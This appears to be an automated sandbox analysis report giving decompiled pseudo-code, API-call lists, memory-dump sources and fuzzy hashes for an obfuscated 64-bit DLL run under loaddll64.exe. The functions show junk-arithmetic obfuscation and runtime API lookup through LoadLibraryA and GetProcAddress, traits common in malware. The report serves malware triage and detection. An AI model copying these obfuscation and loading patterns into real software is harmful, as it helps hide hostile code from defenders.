                                				 *((long long*)(_t241 + 0x10)) = __rbx;
                                				 *(_t241 + 0x20) = r9d;
                                				_push(_t239);
                                				_push(_t237);
                                				_push(_t235);
                                				_push(_t251);
                                				_push(_t253);
                                				_push(_t256);
                                				_t242 = _t241 - 0x80;
                                				r10d = __r9 - 0x3666;
                                				r12d =  *(_t242 + 0xf8);
                                				r14d = __r9 - 0x22c;
                                				 *(_t242 + 0xc0) = r10d;
                                				r8d =  *(_t242 + 0xe8);
                                				_t9 = _t221 - 0x27b2; // 0x0
                                				r8d = r8d + 0xffffee57;
                                				 *(_t242 + 0xd0) = _t9;
                                				 *(_t242 + 0x68) = r8d;
                                				r9d = __rax + 0x1563;
                                				r12d = r12d + 0x984;
                                				r13d = __rax - 0x2103;
                                				 *(_t242 + 0xe8) = r9d;
                                				_t132 = __r10 + 0x23f6;
                                				 *(_t242 + 0x60) = _t132;
                                				if (r9d - _t132 <= 0) goto 0x130e4ab2;
                                				r8d = _t256 - 0x2b1;
                                				r10d = r10d + 0x37e1;
                                				r11d = _t253 + 0x38e9;
                                				_t254 =  *((intOrPtr*)(_t242 + 0x118));
                                				_t21 = _t239 + 0x2598; // 0x2598
                                				 *(_t242 + 0x48) = _t21;
                                				 *(_t242 + 0x40) = _t235 - 0x44a;
                                				r15d = _t256 - 0x11ae;
                                				 *(_t242 + 0x38) = r8d;
                                				_t27 = _t239 + 0x228c; // 0x228c
                                				r9d = _t27;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r15d;
                                				 *(_t242 + 0x20) = r11d;
                                				_t134 = E00007FFC7FFC130FAA10(__rax, __rcx, _t254, __r8, __r9, _t258); // executed
                                				r8d =  *(_t242 + 0xe8);
                                				r10d = _t251 - 0x278;
                                				r12d =  *(_t242 + 0xd0);
                                				_t168 = __rbx - 0x150e;
                                				 *(_t242 + 0x50) = _t168;
                                				r14d = _t134;
                                				 *(_t242 + 0x48) = _t168;
                                				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
                                				r9d = _t251 + 0x27ae;
                                				r11d = _t237 + 0x189;
                                				 *(_t242 + 0x38) =  *(_t242 + 0x60);
                                				_t200 = _t237 + 0x495;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r11d;
                                				r8d = r8d + 0x283;
                                				 *(_t242 + 0x20) = _t254;
                                				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
                                				E00007FFC7FFC130E7120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
                                				LoadLibraryA(_t258);
                                				r10d = __rbx + 0x2ad;
                                				r11d = _t251 + 0x37e1;
                                				 *(_t242 + 0x50) = _t200;
                                				 *((long long*)(_t254 + 0x268)) = __rax;
                                				_t58 = _t237 + 0x1270; // 0x1270
                                				_t188 = _t58;
                                				_t60 = _t256 + 0x81; // 0x81
                                				r8d = _t60;
                                				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
                                				r9d = r15d;
                                				 *(_t242 + 0x48) = _t251 + 0x329d;
                                				 *(_t242 + 0x40) = r10d;
                                				 *(_t242 + 0x38) = r11d;
                                				 *(_t242 + 0x30) = _t235 + 0x1011;
                                				 *(_t242 + 0x28) = _t188;
                                				 *(_t242 + 0x20) = _t254;
                                				E00007FFC7FFC130E2730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
                                				r8d =  *(_t242 + 0xd8);
                                				_t71 = _t256 - 0x1270; // -4720
                                				r10d =  *(_t242 + 0xc0);
                                				 *(_t242 + 0x48) = r8d;
                                				_t75 = _t256 - 0xeb4; // -3764
                                				r11d = _t75;
                                				 *(_t242 + 0x40) = _t71;
                                				_t77 = _t237 + 0xcdf; // 0xcdf
                                				r9d = _t77;
                                				 *(_t242 + 0x38) = _t251 + 0x2103;
                                				r10d = r10d + 0x3a59;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r11d;
                                				 *(_t242 + 0x20) = _t244 + 0x3f3;
                                				E00007FFC7FFC130E1000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
                                				goto 0x130e4c65;
                                				_t219 =  *((intOrPtr*)(_t242 + 0x118));
                                				_t259 = r12d;
                                				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x130e4ae9;
                                				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
                                				_t223 = r10d;
                                				 *(_t242 + 0x60) = _t223;
                                				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x130e4c5f;
                                				_t183 = r9d ^ r12d;
                                				 *(_t242 + 0xd8) = _t183;
                                				_t249 = r9d * 0x36e7;
                                				 *((long long*)(_t242 + 0x70)) = _t249;
                                				 *(_t242 + 0x100) = r14d | 0x00001f2c;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r8d *  *(_t219 + 0x40);
                                				_t217 =  *(_t219 + 0xc8) + _t249;
                                				r11d =  *(_t219 + 0x1c0);
                                				r11d = r11d + 0x1f2c;
                                				_t226 = r13d & _t259 ^ _t217;
                                				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
                                				 *(_t219 + 0xc8) = _t226;
                                				 *(_t242 + 0xf8) = _t190;
                                				r13d = r13d |  *(_t219 + 0x188) | _t183;
                                				r10d = _t217 + _t226;
                                				r9d =  *(_t242 + 0x100);
                                				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
                                				r9d = r9d & _t200;
                                				 *(_t242 + 0x40) = _t219;
                                				 *(_t242 + 0x38) = r10d;
                                				 *(_t242 + 0x30) = r11d;
                                				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
                                				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
                                				E00007FFC7FFC130F98F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
                                				r12d = r12d + 4;
                                				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
                                				r9d =  *(_t242 + 0xe8);
                                				r10d =  *(_t242 + 0xc0);
                                				r8d =  *(_t242 + 0x68);
                                				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x130e4b40;
                                				goto 0x130e4c65;
                                				_t129 = _t239 + 0x3595; // 0x3595
                                				return _t129;
                                			}


































                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 52%
                                			E00007FFC7FFC130ED734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                				long long _v56;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t27;
                                				intOrPtr _t36;
                                				intOrPtr* _t62;
                                				long long _t68;
                                				void* _t70;
                                				long long _t84;
                                				signed int _t85;
                                				intOrPtr* _t86;
                                				void* _t89;
                                
                                				_t70 = __rcx;
                                				_a8 = __rbx;
                                				_t2 = _t70 - 1; // -1
                                				r14d = __ecx;
                                				if (_t2 - 1 <= 0) goto 0x130ed768;
                                				_t27 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t27);
                                				goto 0x130ed897;
                                				E00007FFC7FFC130F05F8();
                                				r8d = 0x104;
                                				GetModuleFileNameA(??, ??, ??);
                                				_t86 =  *0x13124950; // 0x201640f32a0
                                				 *0x13124960 = 0x131243e0;
                                				if (_t86 == 0) goto 0x130ed79f;
                                				if ( *_t86 != dil) goto 0x130ed7a2;
                                				_t62 =  &_a32;
                                				_a24 = _t85;
                                				_v56 = _t62;
                                				r8d = 0;
                                				_a32 = _t85;
                                				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0x131243e0, _t85, 0x131243e0, _t89, __r8,  &_a24);
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_a24, _a32, __r8);
                                				_t68 = _t62;
                                				if (_t62 != 0) goto 0x130ed7f3;
                                				E00007FFC7FFC130EE6A0(_t62);
                                				_t10 = _t68 + 0xc; // 0xc
                                				 *_t62 = _t10;
                                				goto 0x130ed892;
                                				_v56 =  &_a32;
                                				E00007FFC7FFC130ED514(_t68, 0x131243e0, _t68, _t85, 0x131243e0, _t89, _t62 + _a24 * 8,  &_a24);
                                				if (r14d != 1) goto 0x130ed829;
                                				_t36 = _a24 - 1;
                                				 *0x13124940 = _t68;
                                				 *0x1312493c = _t36;
                                				goto 0x130ed7ec;
                                				_a16 = _t85;
                                				0x130efef4();
                                				if (_t36 == 0) goto 0x130ed858;
                                				E00007FFC7FFC130EE114( &_a32, _a16);
                                				_a16 = _t85;
                                				E00007FFC7FFC130EE114( &_a32, _t68);
                                				goto 0x130ed897;
                                				_t84 = _a16;
                                				if ( *_t84 == _t85) goto 0x130ed873;
                                				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x130ed867;
                                				 *0x1312493c = 0;
                                				_a16 = _t85;
                                				 *0x13124940 = _t84;
                                				E00007FFC7FFC130EE114(_t84 + 8, _t85 + 1);
                                				_a16 = _t85;
                                				E00007FFC7FFC130EE114(_t84 + 8, _t68);
                                				return _t36;
                                 			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\loaddll64.exe
                                • API String ID: 3307058713-3772592933
                                • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction ID: 7084bbd1c2dbe938e4b6161fd7881040c3d3f0c8cf2092391de03705d42cb1b7
                                • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction Fuzzy Hash: 8741C532B08E6A8AFB14DF2AE9400BD67E4EF44BA8B544035E94D27795DE3CE461C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 23%
                                			E00007FFC7FFC130E11F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, intOrPtr _a8, void* _a16, void* _a24, long long _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
                                				void* _v32;
                                				void* _v40;
                                				intOrPtr _v48;
                                				long long _v56;
                                				intOrPtr _v64;
                                				intOrPtr _v72;
                                				intOrPtr _v80;
                                				intOrPtr _v88;
                                				intOrPtr _v96;
                                				intOrPtr _v104;
                                				void* __rbx;
                                				intOrPtr _t78;
                                				void* _t99;
                                				intOrPtr _t102;
                                				intOrPtr _t108;
                                				void* _t113;
                                				void* _t119;
                                				signed long long _t126;
                                				void* _t130;
                                				long long _t133;
                                				signed long long _t140;
                                				void* _t151;
                                				signed long long _t159;
                                				void* _t164;
                                				long long _t171;
                                
                                				_t119 = _t151;
                                				r11d = _a88;
                                				_t171 = _a96;
                                				r11d = r11d + 0xfffff8a0;
                                				 *((long long*)(_t119 + 0x10)) = __rbp;
                                				 *((long long*)(_t119 + 0x18)) = __rsi;
                                				 *((long long*)(_t119 - 0x20)) = __r13;
                                				r13d = __rcx - 0x3a59;
                                				 *((long long*)(_t119 - 0x28)) = __r14;
                                				r14d = __r8 - 0x1044;
                                				r8d = _a104;
                                				r8d = r8d + 0xffffdefd;
                                				_a8 = __rdx - 0xfd2;
                                				_a88 = r11d;
                                				_a104 = r8d;
                                				if (r8d - __rcx + 0xf35 >= 0) goto 0x130e130e;
                                				 *((intOrPtr*)(_t171 + 0x98)) =  *((intOrPtr*)(_t171 + 0x368));
                                				r11d = __r8 + 0x329d;
                                				r10d = __r13 + 0x27b2;
                                				_v48 = r10d;
                                				r8d = __rcx + 0xf35;
                                				_v56 = _t171;
                                				_v64 = __rcx + 0xc88;
                                				_t102 = __r13 + 0x27ae;
                                				_v72 = _a64 + 0xde3;
                                				_v80 = r11d;
                                				r9d = __r14 + 0xd93;
                                				_v88 = __r13 + 0x3189;
                                				_v96 = _t102;
                                				_v104 = __r14 - 0x3c4;
                                				_t78 = E00007FFC7FFC130F84E0(_t119, _t130, __rsi, __r8, _t164, __r14); // executed
                                				_t133 =  *((intOrPtr*)(_t171 + 0x348));
                                				r8d = _t78;
                                				 *((long long*)(_t171 + 0x158)) = _t133;
                                				goto 0x130e1428;
                                				_a40 = _t102;
                                				r10d = _t102;
                                				_t108 = _t102;
                                				if (_t108 != 0) goto 0x130e142f;
                                				_a32 = __r12;
                                				r12d = _t133 + 0x2ee;
                                				r12d = r12d & 0x000023f6;
                                				asm("o16 nop [eax+eax]");
                                				if (_t108 == 0) goto 0x130e13c6;
                                				asm("o16 nop [eax+eax]");
                                				ReadFile(??, ??, ??, ??, ??);
                                				if (1 - ( *(_t171 + 0x220) &  *(_t171 + 0xe8)) + 0x1f2c < 0) goto 0x130e1370;
                                				r10d = _a40;
                                				r11d = _a88;
                                				r9d = 0;
                                				if (r12d > 0) goto 0x130e1406;
                                				_t159 =  *(_t171 + 0x1b8) ^ 0x00002598;
                                				if (_t159 == 0) goto 0x130e13fd;
                                				r14d = r14d | r13d ^ 0x00002032;
                                				if (1 != _t159) goto 0x130e13f0;
                                				r9d = r9d + 3;
                                				_t113 = r9d - r12d;
                                				if (_t113 >= 0) goto 0x130e13e0;
                                				r10d = r10d + 4;
                                				_a40 = r10d;
                                				if (_t113 == 0) goto 0x130e1340;
                                				r8d = _a104;
                                				if (r8d - _a88 + 0xffffef7a < 0) goto 0x130e1503;
                                				 *(_t171 + 0x198) =  *(_t171 + 0x198) * 0x1873ac2e;
                                				if ( *((intOrPtr*)(_t171 + 0x158)) == 0) goto 0x130e14a9;
                                				_t126 =  *(_t171 + 0x1e0) | 0x000038e9;
                                				 *(_t171 + 0x198) = _t126;
                                				GetProcessHeap();
                                				if (_t126 == 0) goto 0x130e14a9;
                                				_t140 = _t126;
                                				HeapFree(??, ??, ??);
                                				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x40)) + 0x200)) - 0x24c;
                                				if (_t99 - _t140 > 0) goto 0x130e1503;
                                				asm("o16 nop [eax+eax]");
                                				 *((long long*)(_t171 + 0x228)) =  *((intOrPtr*)(_t171 + 0x228)) - 0x2598;
                                				if (_t99 + 1 - _t140 <= 0) goto 0x130e14e0;
                                				return r14d + 0x17e6;
                                 			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Process$FileFreePrivilegeReadRelease
                                • String ID:
                                • API String ID: 194138994-0
                                • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction ID: 9d81bc32470b191a1162693f1a61b7586ffba95175970f3db8011de9cd3ecde5
                                • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                                • Instruction Fuzzy Hash: 3071BC73605BE58AD720CB15E048BEE77A8FB88B88F525035CB5D57B80EB38E551CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
                                				void* __rbx;
                                				void* _t12;
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                
                                				_t2 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
                                				 *0x131241f8 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
                                				E00007FFC7FFC130EBDF4(1, _t12, _t17, _t18, _t19, _t20);
                                				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
                                				goto 0x130eb8df; // executed
                                				E00007FFC7FFC130EE090(_t17); // executed
                                				if (0 != 0) goto 0x130eb8dd;
                                				E00007FFC7FFC130EC838(0);
                                				goto 0x130eb8c7;
                                				return 1;
                                 			}

                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction ID: 2e6de87951bdce05e13e226305b4458111acbcaf336990c934c9e8c891d01c1f
                                • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction Fuzzy Hash: A2E09240F0CEAF06FD54266211522B81BD00F2532CF210475D8AD722C3CE0D74BAE635
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E00007FFC7FFC130EA970(long long __rax, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
                                				void* __rbx;
                                				void* __rbp;
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				void* _t109;
                                				void* _t116;
                                				void* _t148;
                                				void* _t149;
                                				long long _t151;
                                				signed long long _t154;
                                				signed long long _t161;
                                				signed long long _t165;
                                				void* _t166;
                                				long long _t167;
                                				void* _t178;
                                				void* _t180;
                                				void* _t181;
                                				void* _t184;
                                				void* _t186;
                                				long long _t188;
                                				void* _t190;
                                				void* _t192;
                                				void* _t194;
                                
                                				_t151 = __rax;
                                				_t186 = _t180;
                                				 *(_t186 + 0x18) = r8d;
                                				_push(_t161);
                                				_push(_t178);
                                				_push(_t190);
                                				_t181 = _t180 - 0xa0;
                                				r15d =  *(_t181 + 0x100);
                                				r14d =  *(_t181 + 0x110);
                                				r15d = r15d + 0x119f;
                                				 *((intOrPtr*)(_t181 + 0xd0)) = __rcx - 0x44a;
                                				r10d = __rax - 0x283;
                                				 *(_t181 + 0x84) = r15d;
                                				r13d = __rax + 0x170;
                                				 *(_t181 + 0x80) = r10d;
                                				r14d = r14d + 0x9d7;
                                				 *(_t181 + 0x88) = r14d;
                                				 *((intOrPtr*)(_t181 + 0x148)) = __rcx - 0x36e7;
                                				r8d = __rax - 0x16a;
                                				r9d = __rax + 0xd93;
                                				 *(_t181 + 0x100) = r8d;
                                				_t19 = _t161 + 0x2598; // 0x2598
                                				 *(_t181 + 0x110) = r9d;
                                				if (r13d - _t19 < 0) goto 0x130eae64;
                                				 *((long long*)(_t186 + 0x10)) = __rsi;
                                				 *((long long*)(_t186 - 0x30)) = __rdi;
                                				 *((long long*)(_t186 - 0x38)) = __r12;
                                				if (r15d == __r10 - 0x173a) goto 0x130eacf1;
                                				_t188 =  *((intOrPtr*)(_t181 + 0x130));
                                				r10d = 0x3a59;
                                				r9d = r10d;
                                				 *(_t181 + 0x28) = 0x38e9;
                                				_t167 = _t188;
                                				 *(_t181 + 0x20) = r10w;
                                				r8d = 0x23f6; // executed
                                				E00007FFC7FFC130E9AC0(_t161, __rcx, _t167, _t178, _t194); // executed
                                				r11d = _t178 + 0x37e1;
                                				r9d =  *(_t181 + 0x84);
                                				r10d = _t194 + 0x4c4;
                                				r8d = _t190 - 0x14c1;
                                				 *((long long*)(_t181 + 0x78)) = _t188;
                                				 *((long long*)(_t188 + 0x340)) = _t151;
                                				r15d = r15d + 0xfffff21d;
                                				r9d = r9d + 0xfffff219;
                                				_t154 =  *((intOrPtr*)(_t188 + 0x198)) + 0x0000329d | 0x0000666a;
                                				 *(_t188 + 0x28) =  *(_t188 + 0x28) | _t154;
                                				_t42 = _t161 + 0x27b2; // 0x27b2
                                				 *(_t181 + 0x110) = _t42;
                                				 *((intOrPtr*)(_t181 + 0x70)) = _t190 - 0x278;
                                				r14d = _t190 - 0x17cd;
                                				 *(_t181 + 0x68) = r10d;
                                				 *((intOrPtr*)(_t181 + 0x60)) = r11d;
                                				 *((intOrPtr*)(_t181 + 0x58)) = _t192 + 0x40c;
                                				 *(_t181 + 0x50) = _t190 - 0x12ab;
                                				 *((intOrPtr*)(_t181 + 0x48)) =  *((intOrPtr*)(_t181 + 0xe0));
                                				 *((intOrPtr*)(_t181 + 0x40)) = _t167 + 0x1555;
                                				 *(_t181 + 0x38) =  *(_t181 + 0x110);
                                				 *((intOrPtr*)(_t181 + 0x30)) =  *((intOrPtr*)(_t181 + 0xd0)) + 0xfffff515;
                                				 *(_t181 + 0x28) = r14d;
                                				 *(_t181 + 0x20) = r15d;
                                				_t109 = E00007FFC7FFC130F8680( *((intOrPtr*)(_t181 + 0x148)) + 0x30d5, _t161, __rcx, _t167, __rsi, __r8, _t184, __r10, _t188, _t190, _t194); // executed
                                				r9d = 0x1f2c;
                                				 *(_t181 + 0x28) = _t161;
                                				r8d = 0x329d;
                                				 *(_t181 + 0x20) = 0x343a;
                                				E00007FFC7FFC130E9AC0(_t161, __rcx, _t188, _t178, _t192); // executed
                                				 *(_t188 + 0x358) = _t154;
                                				_t165 =  *((intOrPtr*)(_t188 + 0x1b0)) + _t161;
                                				 *( *_t188 + 0x1e0) =  *( *_t188 + 0x1e0) | _t165;
                                				r8d =  *( *((intOrPtr*)(_t188 + 0x40)) + 0x150);
                                				r8d = r8d ^ 0x000017cd;
                                				_t148 = r8d - 0x343c;
                                				if (_t148 >= 0) goto 0x130eabf1;
                                				_t166 = _t165 - 1;
                                				if (_t148 != 0) goto 0x130eabe0;
                                				 *((long long*)(_t188 + 0x198)) =  *((intOrPtr*)(_t188 + 0x198)) + ( *(_t188 + 0xb8) ^ 0x000027b2);
                                				_t149 =  *((intOrPtr*)( *_t188 + 0x130)) - 0x3c5 - 0x2032;
                                				if (_t149 >= 0) goto 0x130eac25;
                                				if (_t149 != 0) goto 0x130eac17;
                                				 *(_t188 + 0x1b8) =  *(_t188 + 0x1c0) | _t161;
                                				r10d = _t190 - 0x4c4;
                                				r8d = _t190 - 0x1a27;
                                				r11d = _t166 - 0xeb4;
                                				 *((long long*)(_t188 + 0x158)) =  *((intOrPtr*)(_t188 + 0x140));
                                				 *((intOrPtr*)(_t181 + 0x58)) = _t190 - 0x8d0;
                                				r9d = _t166 + 0xefd;
                                				 *(_t181 + 0x50) = r10d;
                                				 *((intOrPtr*)(_t181 + 0x48)) = r11d;
                                				 *((long long*)(_t181 + 0x40)) = _t188;
                                				 *(_t181 + 0x38) = _t166 + 0x3f3;
                                				 *((intOrPtr*)(_t181 + 0x30)) = _t166 + 0x13da;
                                				 *(_t181 + 0x28) =  *(_t181 + 0x110);
                                				 *(_t181 + 0x20) = _t109 + 0x70c;
                                				_t116 = E00007FFC7FFC130F9610( *((intOrPtr*)(_t188 + 0x140)), _t161, _t166,  *(_t188 + 0x1c0) | _t161, __r8, _t184, __r10, _t188, _t190, _t192, _t194); // executed
                                				return _t116 + 0x1086;
                                			}

                                APIs
